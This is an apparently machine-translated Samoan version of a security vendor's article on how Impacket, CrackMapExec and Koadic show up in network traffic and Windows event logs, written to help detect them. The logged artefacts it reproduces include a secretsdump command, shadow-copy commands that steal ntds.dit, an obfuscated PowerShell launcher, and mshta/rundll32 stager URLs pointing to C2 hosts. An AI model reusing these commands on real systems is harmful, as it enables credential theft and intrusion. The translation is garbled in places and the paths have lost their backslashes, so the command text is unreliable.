Ole numera o osofaʻiga ile vaega faʻapisinisi e faʻatupulaia i tausaga taʻitasi: mo se faʻataʻitaʻiga nai lo le 2016, ma i le faaiuga o le 2018 - nai lo le vaitaimi ua mavae. E aofia ai i latou o loʻo i ai le meafaigaluega galue autu o le Windows operating system. I le 2017-2018, o le APT Dragonfly, APT28, faia osofaʻiga i faʻalapotopotoga a le malo ma le militeri i Europa, Amerika i Matu ma Saudi Arabia. Ma sa matou faʻaaogaina meafaigaluega e tolu mo lenei - , и . O lo'o tatala a latou fa'ailoga puna ma avanoa ile GitHub.
E taua le matauina o nei meafaigaluega e le o faʻaaogaina mo le ulu muamua, ae ia atiaʻe se osofaʻiga i totonu o atinaʻe. E fa'aogaina e tagata osofa'i i la'asaga 'ese'ese o le osofa'iga pe a mae'a le ulu atu i le nofoaga. O lenei, i le ala, e faigata ona iloa ma masani lava i le fesoasoani a tekinolosi po o meafaigaluega e mafai ai . O meafaigaluega e maua ai le tele o galuega, mai le fesiitaiga o faila i le fegalegaleai ma le resitala ma le faʻatinoina o poloaiga i luga o se masini mamao. Na matou faia se suʻesuʻega o nei meafaigaluega e faʻamautinoa ai a latou gaioiga fesoʻotaʻiga.
Le mea e tatau ona matou faia:
- Malamalama pe faapefea ona galue meafaigaluega hacking. Su'e po'o a mea e mana'omia e tagata osofa'i ona fa'aogaina ma po'o a tekinolosi e mafai ona latou fa'aogaina.
- Su'e mea e le o iloa e meafaigaluega fa'amatalaga fa'amatalaga i vaega muamua o se osofa'iga. Ole vaega ole su'esu'ega e mafai ona fa'ase'e, pe ona o le tagata osofa'i ose osofa'iga i totonu, pe ona o le osofa'i o lo'o fa'aogaina se pu i totonu o atina'e e le'i iloa muamua. E mafai ona toe faʻafoʻisia le filifili atoa o ana gaioiga, o le mea lea o le manaʻo e iloa atili le gaioiga.
- Ave'ese fa'ailoga sese mai meafaigaluega e su'e ai fa'alavelave. E le tatau ona galo ia i tatou pe a iloa nisi o gaioiga i luga o le faavae o le suʻesuʻeina naʻo ia, e mafai ona faia ni mea sese. E masani lava i totonu o atinaʻe o loʻo i ai se numera tele o auala, e le mafai ona faʻamaonia mai le tulafono i le tepa muamua, e maua ai soʻo se faʻamatalaga.
O le a le mea e tuʻuina atu e nei meafaigaluega i tagata osofaʻi? Afai o le Impacket lea, ona maua lea e le au osofaʻi se faletusi tele o modules e mafai ona faʻaogaina i laʻasaga eseese o le osofaʻiga e mulimuli mai pe a uma ona talepe le nofoaga. Tele meafaigaluega e fa'aoga Impacket modules i totonu - mo se fa'ata'ita'iga, Metasploit. E iai le dcomexec ma le wmiexec mo le faʻatinoina o le faʻatonuga mamao, secretsdump mo le mauaina o tala mai le manatua e faʻaopoopo mai le Impacket. O se taunuuga, o le suʻesuʻeina saʻo o le gaioiga o sea faletusi o le a mautinoa ai le mauaina o mea e maua mai ai.
E leʻo se mea faʻafuaseʻi na tusia e le au foafoa le "Powered by Impacket" e uiga i CrackMapExec (poʻo le CME). E le gata i lea, o le CME o loʻo i ai galuega faʻatino mo faʻaaliga lauiloa: Mimikatz mo le mauaina o faʻaupuga poʻo latou faʻailoga, faʻatinoga o Meterpreter poʻo le sui o le Malo mo le faʻataunuʻuina mamao, ma le Bloodhound i luga o le laupapa.
O le meafaigaluega lona tolu na matou filifilia o Koadic. E leʻi leva talu ai nei, na tuʻuina atu i le konafesi faʻavaomalo faʻavaomalo DEFCON 25 i le 2017 ma faʻailogaina i se auala e le masani ai: e galue e ala i HTTP, Java Script ma Microsoft Visual Basic Script (VBS). O lenei faiga e taʻua o le ola i fafo: o le meafaigaluega e faʻaaogaina se seti o faʻalagolago ma faletusi ua fausia i totonu o Windows. E taʻua e le au fatu COM Command & Control, poʻo le C3.
FA'AMATALAGA
O galuega a Impacket e matua lautele, e amata mai i le suʻesuʻeina i totonu o le AD ma le aoina mai o faʻamatalaga mai totonu ole MS SQL servers, i metotia mo le mauaina o faʻamaoniga: o se osofaʻiga SMB relay lea, ma le mauaina o le faila ntds.dit o loʻo i ai faʻamatalaga o upu faʻaoga mai le pule o le pule. E fa'atino fo'i e le Impacket ni fa'atonuga mamao e fa'aaoga ai auala eseese e fa: WMI, Windows Scheduler Management Service, DCOM, ma le SMB, ma mana'omia ni fa'amaoniga e fai ai.
Secretsdump
Sei o tatou tilotilo ile secretsdump. Ole module lea e mafai ona fa'atatau i masini fa'aoga ma pule ole vaega. E mafai ona faʻaaogaina e maua ai kopi o nofoaga manatua LSA, SAM, SECURITY, NTDS.dit, ina ia mafai ona vaʻaia i vaega eseese o le osofaʻiga. O le laasaga muamua i le faʻaogaina o le module o le faʻamaoniga e ala i le SMB, lea e manaʻomia ai le faʻaupuga a le tagata faʻaoga poʻo lona hash e otometi ai ona faʻataunuʻu le osofaʻiga Pass the Hash. Sosoo mai ai se talosaga e tatala le avanoa i le Pule Pulea Auaunaga (SCM) ma maua le avanoa i le resitala e ala i le winreg protocol, e faʻaaoga ai e le tagata osofaʻi e mafai ona suʻeina faʻamatalaga o lala o tului ma maua ai faʻaiʻuga e ala i le SMB.
I le Ata. 1 matou te vaʻai pe faʻafefea tonu pe a faʻaaogaina le winreg protocol, e maua le avanoa e faʻaaoga ai se ki resitala ma se LSA. Ina ia faia lenei mea, faʻaaoga le DCERPC poloaiga ma le opcode 15 - OpenKey.
Alaisa. 1. Tatala se ki resitala e faʻaaoga ai le winreg protocol
Ma le isi, pe a maua le avanoa i le ki, o tau e faʻasaoina i le SaveKey command ma le opcode 20. Impacket e faia lenei mea i se auala faʻapitoa. E fa'asaoina le tau i se faila o lona igoa o se manoa o 8 mata'itusi fa'aopoopo fa'atasi ma le .tmp. E le gata i lea, o le faʻapipiʻiina atili o lenei faila e tupu mai i le SMB mai le System32 directory (Fig. 2).
Alaisa. 2. Fuafuaga mo le mauaina o se ki resitala mai se masini mamao
E foliga mai o ia gaioiga i luga o le upega tafaʻilagi e mafai ona iloa e ala i fesili i nisi lala resitala e faʻaaoga ai le winreg protocol, igoa patino, poloaiga ma la latou faʻatonuga.
O lenei module e tuʻu ai foʻi faʻailoga i le Windows event log, faʻafaigofie ona iloa. Mo se faʻataʻitaʻiga, o se taunuuga o le faʻatinoina o le faʻatonuga
secretsdump.py -debug -system SYSTEM -sam SAM -ntds NTDS -security SECURITY -bootkey BOOTKEY -outputfile 1.txt -use-vss -exec-method mmcexec -user-status -dc-ip 192.168.202.100 -target-ip 192.168.202.100 contoso/Administrator:@DCI le Windows Server 2016 log o le a tatou vaʻai i le faʻasologa autu o mea tutupu:
1. 4624 - Logon mamao.
2. 5145 - siaki aia tatau i le winreg mamao auaunaga.
3. 5145 - siaki aia tatau avanoa faila i le System32 directory. O le faila e iai le igoa fa'afuase'i o lo'o ta'ua i luga.
4. 4688 - faia se faiga cmd.exe e fa'alauiloa vssadmin:
“C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin list shadows ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat5. 4688 - faia se faagasologa ma le poloaiga:
"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin create shadow /For=C: ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat6. 4688 - faia se faagasologa ma le poloaiga:
"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C copy ?GLOBALROOTDeviceHarddiskVolumeShadowCopy3WindowsNTDSntds.dit %SYSTEMROOT%TemprmumAfcn.tmp ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat7. 4688 - faia se faagasologa ma le poloaiga:
"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin delete shadows /For=C: /Quiet ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.batSmbexec
E pei o le tele o meafaigaluega faʻaaogaina, Impacket ei ai ni faʻaoga mo le faʻatinoina o poloaiga. O le a tatou taulai atu i le smbexec, lea e maua ai se atigi faʻatonuga fesoʻotaʻi i luga o se masini mamao. O lenei module e manaʻomia foʻi le faʻamaoniaina e ala i le SMB, pe faʻatasi ma se upu faʻaulu poʻo se upu faʻamaonia hash. I le Ata. I le Ata 3 tatou te vaʻai i se faʻataʻitaʻiga o le auala e galue ai se meafaigaluega, i lenei tulaga o le faʻamafanafanaga faʻapitonuʻu.
Alaisa. 3. Feso'ota'i smbexec fa'amafanafanaga
O le laasaga muamua o le smbexec pe a uma le faʻamaonia o le tatalaina lea o le SCM ma le OpenSCManagerW poloaiga (15). O le fesili e iloga: ole MachineName fanua ole DUMMY.
Alaisa. 4. Talosaga e tatala le Pule Pulea Auaunaga
O le isi, ua faia le auaunaga e faʻaaoga ai le CreateServiceW poloaiga (12). I le tulaga o le smbexec, e mafai ona tatou vaʻai i le faʻatonuga tutusa o le fausiaina o manatu i taimi uma. I le Ata. 5 lanu meamata o loʻo faʻaalia ai faʻatonuga e le mafai ona suia, lanu samasama e faʻaalia ai le mea e mafai e se tagata osofaʻi ona suia. E faigofie ona iloa e mafai ona suia le igoa o le faila faila, lona lisi ma le faila faila, ae o isi e sili atu ona faigata ona suia e aunoa ma le faʻalavelaveina o le manatu o le Impacket module.
Alaisa. 5. Talosaga e fai se auaunaga e fa'aaoga ai le Pule Pulea Auaunaga
Smbexec e tuʻuina atu foʻi faʻailoga manino i le Windows event log. I le Windows Server 2016 log mo le fesoʻotaʻiga faʻatonu atigi ma le ipconfig poloaiga, o le a tatou vaʻai i le faasologa autu o mea tutupu:
1. 4697 - faʻapipiʻiina o le tautua i luga o le masini a le tagata manua:
%COMSPEC% /Q /c echo cd ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
2. 4688 - fatuina o le cmd.exe faagasologa ma finauga mai le vaega 1.
3. 5145 - siaki aia tatau i le faila __output i le C$ directory.
4. 4697 - faʻapipiʻiina o le tautua i luga o le masini a le tagata manua.
%COMSPEC% /Q /c echo ipconfig ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
5. 4688 - fatuina o le cmd.exe faagasologa ma finauga mai le vaega 4.
6. 5145 - siaki aia tatau i le faila __output i le C$ directory.
Impacket o le faʻavae mo le atinaʻeina o meafaigaluega osofaʻi. E lagolagoina toetoe lava o faʻasalalauga uma i totonu o atinaʻe a Windows ma i le taimi lava e tasi e iai ona lava uiga. O lo'o i ai talosaga fa'apitoa winreg, ma le fa'aogaina o le SCM API fa'atasi ai ma fa'atonuga fa'apitoa, ma le fa'asologa o igoa faila, ma le SMB fa'asoa SYSTEM32.
CRACKMAPEXEC
O le meafaigaluega a le CME ua mamanuina muamua e faʻatometi na gaioiga masani e tatau ona faia e se tagata osofaʻi e agai i luma i totonu o le fesoʻotaʻiga. E fa'atagaina oe e galulue fa'atasi ma le sui ta'uta'ua o le Emepaea ma le Meterpreter. Ina ia faia fa'alilolilo poloaiga, e mafai e le CME ona fa'anenefu. Fa'aaogaina o le Bloodhound (se mea faigaluega fa'apitoa), e mafai e se tagata osofa'i ona fa'aautomatika le su'ega mo se fa'atonuga fa'atonu vaega.
Toto toto
Bloodhound, e avea o se mea faigaluega tutoʻatasi, e mafai ai mo le faʻalauteleina o suʻesuʻega i totonu o le fesoʻotaʻiga. E aoina faʻamatalaga e uiga i tagata faʻaoga, masini, vaega, vasega ma tuʻuina atu o se PowerShell script poʻo faila faila. LDAP po'o SMB fa'avae fa'avae e fa'aogaina e aoina ai fa'amatalaga. O le CME integration module e mafai ai e le Bloodhound ona sii mai i le masini a le tagata manua, tamoʻe ma maua faʻamaumauga na aoina pe a maeʻa le faʻataunuʻuina, ma faʻaogaina ai gaioiga i totonu o le tino ma faʻaitiitia ai le iloa. O le atigi ata o le Bloodhound o loʻo tuʻuina atu faʻamatalaga aoina i foliga o kalafi, lea e mafai ai ona e suʻeina le ala sili ona puupuu mai le masini a le tagata osofaʻi i le pule o le pule.
Alaisa. 6. Fa'afeso'ota'i toto
Ina ia tamoe i luga o le masini a le tagata manua, o le module e fatuina se galuega e faʻaaoga ai le ATSVC ma le SMB. ATSVC o se atinaʻe mo le galue ma le Windows Task Scheduler. E fa'aoga e le CME lana galuega NetrJobAdd(1) e fai ai galuega i luga ole upega. O se faʻataʻitaʻiga o mea e lafo e le CME module o loʻo faʻaalia i le Ata. 7: Ole cmd.exe lea o le faʻatonuina o le telefoni ma faʻailoga faʻailoga ile tulaga o finauga ile XML format.
Ata.7. Fausia se galuega e ala ile CME
A maeʻa ona tuʻuina atu le galuega mo le faʻataunuʻuina, o le masini a le tagata manua e amata le Bloodhound lava ia, ma e mafai ona iloa i le auala. O le module o loʻo faʻaalia i fesili a le LDAP e maua ai vaega masani, se lisi o masini uma ma tagata faʻaoga i totonu o le vaega, ma maua faʻamatalaga e uiga i faʻaoga faʻaoga faʻaoga e ala i le talosaga SRVSVC NetSessEnum.
Alaisa. 8. Mauaina o se lisi o sauniga toaga e ala i le SMB
E le gata i lea, o le tatalaina o le Bloodhound i luga o le masini a le tagata manua ua mafai ona suetusi e o faatasi ma se mea na tupu ma le ID 4688 (faasologa o galuega) ma le igoa o le faagasologa. «C:WindowsSystem32cmd.exe». O le mea e iloga i ai o le faʻatonuga laina finauga:
cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C " & ( $eNV:cOmSPEc[4,26,25]-JOiN'')( [chAR[]](91 , 78, 101,116 , 46, 83 , 101 , … , 40,41 )-jOIN'' ) "Enum_avproducts
O le enum_avproducts module e manaia tele mai le vaaiga o le faʻatinoga ma le faʻatinoga. E fa'atagaina oe e le WMI e fa'aoga le gagana fesili WQL e toe aumai ai fa'amaumauga mai mea fa'apitoa a Windows, o le mea tonu lava lea e fa'aogaina e lenei CME module. E fa'atupuina fesili i vasega AntiSpywareProduct ma AntiМirusProduct e uiga i mea faigaluega puipui na fa'apipi'iina i le masini a le tagata manu'a. Ina ia maua faʻamatalaga talafeagai, e fesoʻotaʻi le module i le rootSecurityCenter2 namespace, ona faʻatupuina lea o se fesili WQL ma maua se tali. I le Ata. O le ata 9 o loʻo faʻaalia ai mea o loʻo i totonu o ia talosaga ma tali. I la matou faʻataʻitaʻiga, na maua le Windows Defender.
Alaisa. 9. Gaioiga feso'ota'iga o le enum_avproducts module
E masani lava, o le su'ega a le WMI (Trace WMI-Activity), e mafai ona e maua ai fa'amatalaga aoga e uiga i fesili a le WQL, e ono le mafai. Ae afai e mafai, afai e faʻatautaia le enum_avproducts script, o le a faʻasaoina se mea na tupu ma le ID 11. O le a aofia ai le igoa o le tagata faʻaoga na lafoina le talosaga ma le igoa i le rootSecurityCenter2 namespace.
E tofu lava le CME modules ma ana lava mea, pe o ni fesili patino WQL poʻo le fatuina o se ituaiga o galuega i totonu o se faʻatulagaina o galuega ma le faʻaogaina ma le Bloodhound-faʻapitoa i le LDAP ma le SMB.
KOADIC
O se vaega fa'apitoa o Koadic o le fa'aogaina lea o fa'aliliuupu JavaScript ma VBScript ua fausia i totonu o Windows. I lenei tulaga, e mulimuli i le ola mai le tulaga o fanua - o lona uiga, e leai se faʻalagolago i fafo ma faʻaogaina meafaigaluega masani a Windows. O se meafaigaluega lea mo le Poloaiga atoa & Pulea (CnC), talu ai a maeʻa faʻamaʻi faʻapipiʻi le "implant" i luga o le masini, e mafai ai ona pulea. O sea masini, i upu Koadic, e taʻua o le "zombie." Afai e le lava avanoa mo le gaioiga atoatoa i le itu o le tagata manua, e iai le malosi o Koadic e faʻatupuina i latou e faʻaaoga ai le User Account Control bypass (UAC bypass).
Alaisa. 10. Koadic Shell
E tatau i le tagata manu'a ona amata feso'ota'iga ma le server Command & Control. Ina ia faia lenei mea, e manaʻomia ona ia faʻafesoʻotaʻi se URI na saunia muamua ma maua le tino Koadic autu e faʻaaoga ai se tasi o taʻaloga. I le Ata. Ata 11 o loʻo faʻaalia ai se faʻataʻitaʻiga mo le mshta stager.
Alaisa. 11. Amataina se sauniga ma le server CnC
Faʻavae i luga ole tali ole WS, e faʻaalia manino ai o le faʻatinoga e tupu ile WScript.Shell, ma o fesuiaiga STGER, SESSIONKEY, JOBKEY, JOBKEYPATH, EXPIRE o loʻo i ai faʻamatalaga autu e uiga i faʻasologa o le taimi nei. O le ulua'i talosaga-tali pa'aga i se HTTP feso'ota'iga ma se CnC server. O talosaga mulimuli ane e fesoʻotaʻi saʻo ma le faʻatinoga o le taʻua o modules (implants). O fa'aoga Koadic uma e galue na'o se fa'agaioiga fa'atasi ma le CnC.
Mimikatz
E pei lava o le CME o loʻo galue ma Bloodhound, e galulue Koadic ma Mimikatz o se polokalame ese ma e tele auala e faʻalauiloa ai. O loʻo i lalo se paʻaga talosaga-tali mo le laʻuina o le Mimikatz implant.
Alaisa. 12. Siitia Mimikatz i Koadic
E mafai ona e vaʻai pe faʻafefea ona suia le faatulagaga URI i le talosaga. O loʻo i ai nei se tau mo le fesuiaiga csrf, lea e nafa ma le module filifilia. Aua e te faalogo i lona igoa; Matou te iloa uma o le CSRF e masani ona malamalama i ai i se tulaga ese. O le tali o le tino autu lava lea e tasi o Koadic, lea na faʻaopoopoina ai le code e fesoʻotaʻi ma Mimikatz. E fai si telē, o lea seʻi o tatou vaavaai i manatu autū. O iinei o loʻo i ai le faletusi Mimikatz ua faʻapipiʻiina i base64, o se vasega .NET faʻasologa o le a tui, ma finauga e faʻalauiloa Mimikatz. O le fa'ai'uga o le fa'atinoga o lo'o tu'uina atu i luga o le feso'otaiga i tusitusiga manino.
Alaisa. 13. I'uga o le tamoe Mimikatz i luga o se masini mamao
Exec_cmd
E iai fo'i modules a Koadic e mafai ona fa'atino fa'atonuga mamao. O iinei o le a tatou vaʻavaʻai ai i le auala tutusa o le URI ma le masani sid ma csrf fesuiaiga. I le tulaga o le exec_cmd module, ua faʻaopoopo le code i le tino e mafai ona faʻatinoina faʻatonuga atigi. O loʻo faʻaalia i lalo sea code o loʻo i totonu o le tali HTTP a le CnC server.
Alaisa. 14. Fa'apipi'i le code exec_cmd
Ole GAWTUUGCFI fa'atasi ma le uiga masani WS e mana'omia mo le fa'atinoina o tulafono. Faatasi ai ma lana fesoasoani, o le mea faʻapipiʻi e valaʻau ai le atigi, faʻaogaina lala e lua o le code - shell.exec faʻatasi ai ma le toe foʻi mai o le faʻasologa o faʻamaumauga ma shell.run e aunoa ma le toe foʻi mai.
O le Koadic e le o se mea faigaluega masani, ae o loʻo i ai ana lava mea taua e mafai ona maua ai i fefaʻatauaiga talafeagai:
- faʻavae faʻapitoa o talosaga HTTP,
- fa'aaoga winHttpRequests API,
- fatuina o se mea WScript.Shell e ala i ActiveXObject,
- tino executable tele.
O le uluai fesoʻotaʻiga e amataina e le stager, o lea e mafai ai ona iloa lana gaioiga e ala i mea Windows. Mo mshta, o le mea lea 4688, lea e faʻaalia ai le faia o se faagasologa ma le uiga amata:
C:Windowssystem32mshta.exe http://192.168.211.1:9999/dXpT6A'o tamo'e Koadic, e mafai ona e va'ai i isi 4688 mea na tutupu fa'atasi ai ma uiga lelei e fa'aalia ai:
rundll32.exe http://192.168.241.1:9999/dXpT6?sid=1dbef04007a64fba83edb3f3928c9c6c; csrf=;......mshtml,RunHTMLApplication
rundll32.exe http://192.168.202.136:9999/dXpT6?sid=12e0bbf6e9e5405690e5ede8ed651100;csrf=18f93a28e0874f0d8d475d154bed1983;......mshtml,RunHTMLApplication
"C:Windowssystem32cmd.exe" /q /c chcp 437 & net session 1> C:Usersuser02AppDataLocalTemp6dc91b53-ddef-2357-4457-04a3c333db06.txt 2>&1
"C:Windowssystem32cmd.exe" /q /c chcp 437 & ipconfig 1> C:Usersuser02AppDataLocalTemp721d2d0a-890f-9549-96bd-875a495689b7.txt 2>&1sailiiliga
O le ola i luga o le fanua ua maua le lauiloa i tagata solitulafono. Latou te faʻaogaina meafaigaluega ma masini faʻapipiʻi i totonu o Windows mo latou manaʻoga. O loʻo matou vaʻai i meafaigaluega lauiloa Koadic, CrackMapExec ma Impacket e mulimuli i lenei mataupu faʻavae ua faʻaalia i lipoti APT. Ole numera o tui ile GitHub mo nei mea faigaluega o loʻo faʻatupulaia foi, ma o loʻo faʻaalia ni mea fou (ua tusa ma le afe o latou i le taimi nei). O loʻo faʻatupuina le lauiloa ona o lona faigofie: e le manaʻomia e tagata osofaʻi ni mea faigaluega lona tolu; o loʻo i luga o masini a tagata afaina ma fesoasoani ia i latou e aloese mai faiga saogalemu. Matou te taulaʻi i le suʻesuʻeina o fesoʻotaʻiga fesoʻotaʻiga: o meafaigaluega taʻitasi o loʻo faʻamatalaina i luga e tuʻu ai ona lava faʻailoga i fefaʻatauaiga o fesoʻotaiga; su'esu'ega au'ili'ili ia i latou na mafai ai ona matou a'oa'oina a matou oloa iloa i latou, lea e fesoasoani mulimuli e suʻesuʻe le faasologa atoa o faʻalavelave faʻainitaneti e aofia ai i latou.
tusitala:
- Anton Tyurin, Ulu o Auaunaga Tomai Faapitoa, PT Expert Security Center, Positive Technologies
- Egor Podmokov, tagata poto, PT Expert Security Center, Positive Technologies
puna: www.habr.com